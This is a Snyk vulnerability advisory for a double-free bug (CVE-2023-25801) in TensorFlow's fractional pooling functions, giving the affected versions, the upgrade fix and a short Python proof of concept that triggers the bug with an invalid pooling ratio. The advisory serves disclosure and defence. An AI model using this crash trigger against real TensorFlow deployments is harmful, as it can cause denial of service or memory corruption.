Double Free Affecting tensorflow package, versions [,2.11.1) [2.12.0rc0,2.12.0)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (14th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-TENSORFLOW-3372999
- published 26 Mar 2023
- disclosed 26 Mar 2023
- credit dmc1778
Introduced: 26 Mar 2023
CVE-2023-25801 Open this link in a new tabHow to fix?
Upgrade tensorflow
to version 2.11.1, 2.12.0 or higher.
Overview
tensorflow is a machine learning framework.
Affected versions of this package are vulnerable to Double Free. The nn_ops.fractional_avg_pool_v2
and nn_ops.fractional_max_pool_v2
functions require the first and fourth elements of their parameter pooling_ratio
to be equal to 1.0, as pooling on batch and channel dimensions is not supported.
PoC
import tensorflow as tf
import os
import numpy as np
from tensorflow.python.ops import nn_ops
try:
arg_0_tensor = tf.random.uniform([3, 30, 50, 3], dtype=tf.float64)
arg_0 = tf.identity(arg_0_tensor)
arg_1_0 = 2
arg_1_1 = 3
arg_1_2 = 1
arg_1_3 = 1
arg_1 = [arg_1_0,arg_1_1,arg_1_2,arg_1_3,]
arg_2 = True
arg_3 = True
seed = 341261001
out = nn_ops.fractional_avg_pool_v2(arg_0,arg_1,arg_2,arg_3,seed=seed,)
except Exception as e:
print("Error:"+str(e))
References
CVSS Scores
version 3.1